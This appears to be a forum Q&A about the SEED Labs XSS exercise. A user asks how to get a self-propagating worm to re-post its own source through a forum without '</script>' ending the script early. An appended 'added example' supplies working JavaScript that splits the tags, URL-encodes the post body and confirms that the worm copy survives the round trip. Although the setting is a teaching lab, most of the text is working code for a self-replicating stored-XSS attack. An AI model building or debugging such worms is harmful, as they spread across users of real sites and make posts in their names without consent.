I'm working on porting this lab for a project: http://www.cis.syr.edu/~wedu/seed/Labs/Attacks_XSS/XSS.pdf
First, however, I have to be able to complete it myself. I'm trying to work out the self-propagating worm, and having some difficulties. How can I send a script tag through the content? If I try:
// grab the worm's own source from the script element it lives in
var wormCode = document.getElementById("worm");
var escapedWorm = escape(wormCode.innerHTML);
// the closing tag below is what breaks out of the enclosing script
content = "topicTitle=testprop&postText=<script>" + escapedWorm + "</script>&forum=3&action=ptopic";
Ajax.send(content);
The tag breaks out of the larger JavaScript this sits in. I've also tried splitting it up as:
...+"</scr"+"ipt>&...
but this did not work.
Any tips?
Edit: updated with my more recent (and, I hope, accurate) attempts.
// grab the worm's own source from the script element it lives in
var wormCode = document.getElementById("worm");
// build the wrapper with the tags split so "</script>" never appears in one piece
var escapedWorm = escape("<" + "script>" + wormCode.innerHTML + "</" + "script>");
content = "topicTitle=testprop&forum=3&action=ptopic&postText=" + escapedWorm;
Ajax.send(content);
You aren't escaping the script tags.
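An added example, not code from the question, the answer or the SEED lab, that shows the two things going wrong above in working code. First, the HTML tokenizer ends a script element at the first `</script` it meets, case-insensitively, whatever the surrounding JavaScript context is, so a worm whose own source spells `</script>` in one piece cannot be re-emitted inline; splitting the tag (`"</" + "script>"`) keeps that sequence out of the source text. Second, `escape()` leaves `+` unencoded, and a form decoder turns a bare `+` into a space, so every `"a" + "b"` in an `escape()`d worm arrives as `"a"   "b"`; `encodeURIComponent()` encodes it as `%2B`. The worm body, the form-field names and the `id="worm"` element are constructed for the example; the parser below is a deliberately minimal model of the tokenizer's script-data rule, not a full HTML parser.

```javascript
// Added example (not from the original post or the SEED lab): why a worm body
// that spells "</script>" in one piece cannot be re-emitted inside an inline
// <script>, and how to build and encode the self-propagating post body so the
// copy survives the round trip through the forum.

// The HTML tokenizer ends a <script> element at the first "</script" it sees
// (case-insensitive), regardless of JavaScript string or comment context.
const SCRIPT_END = /<\/script/i;

// Minimal model of the browser's behaviour on the rendered post: take the text
// after the first <script ...> tag and stop at the first "</script". Returns the
// JavaScript source that would actually execute.
function scriptSourceAsParsed(html) {
  const open = html.indexOf(">", html.search(/<script\b/i)) + 1;
  const close = html.slice(open).search(SCRIPT_END);
  return close === -1 ? html.slice(open) : html.slice(open, open + close);
}

// Wrap the worm body in <script> tags without spelling "</script>" in one
// piece, so this wrapper is itself safe to carry inside the next generation.
function wrapInScriptTag(wormBody) {
  return "<" + 'script id="worm">' + wormBody + "</" + "script>";
}

// application/x-www-form-urlencoded body for the forum post. encodeURIComponent
// is used rather than escape(): escape() leaves "+" unencoded, and form decoders
// turn a bare "+" into a space, corrupting every "a" + "b" in the worm.
function buildPostBody(fields) {
  return Object.keys(fields)
    .map((k) => encodeURIComponent(k) + "=" + encodeURIComponent(fields[k]))
    .join("&");
}

// Server-side view of the body, as a typical form decoder produces it
// ("+" becomes a space, then percent-decoding).
function parsePostBody(body) {
  const out = {};
  for (const pair of body.split("&")) {
    const [k, v] = pair.split("=");
    out[decodeURIComponent(k)] = decodeURIComponent(v.replace(/\+/g, " "));
  }
  return out;
}

// Constructed worm body for this example (not the lab's worm): it reads its own
// element and builds a copy, with the tags split so "</script" never appears.
const WORM_BODY = [
  'var self = document.getElementById("worm").innerHTML;',
  'var copy = "<" + "script id=\\"worm\\">" + self + "</" + "script>";',
  "/* ...POST copy as postText via XMLHttpRequest... */",
].join("\n");

// The same idea written naively: the closing tag appears verbatim.
const NAIVE_WORM_BODY = 'var copy = "<script>" + self + "</script>";';

// What the browser would execute from a given worm body once it is rendered.
function executedSource(wormBody) {
  return scriptSourceAsParsed(wrapInScriptTag(wormBody));
}

// Full round trip: build the request body, decode it server-side, render the
// stored post. True when the copy the browser executes is the original body.
function wormSurvivesRoundTrip(wormBody) {
  const body = buildPostBody({
    topicTitle: "testprop",
    forum: "3",
    action: "ptopic",
    postText: wrapInScriptTag(wormBody),
  });
  const stored = parsePostBody(body).postText;
  return scriptSourceAsParsed(stored) === wormBody;
}

// The escape() caveat in isolation: "+" is left alone by escape(), so after the
// server decodes the form body the worm's concatenations have lost their "+".
function escapeBreaksConcatenation() {
  const stored = parsePostBody("postText=" + escape(WORM_BODY)).postText;
  return stored !== WORM_BODY;
}
```

Running `wormSurvivesRoundTrip(WORM_BODY)` returns true, while the naive body is cut off at `var copy = "<script>" + self + "`, an unterminated string literal that the browser never executes. The same split-tag rule applies to anything else the worm re-emits that contains `</script`, for example a comment.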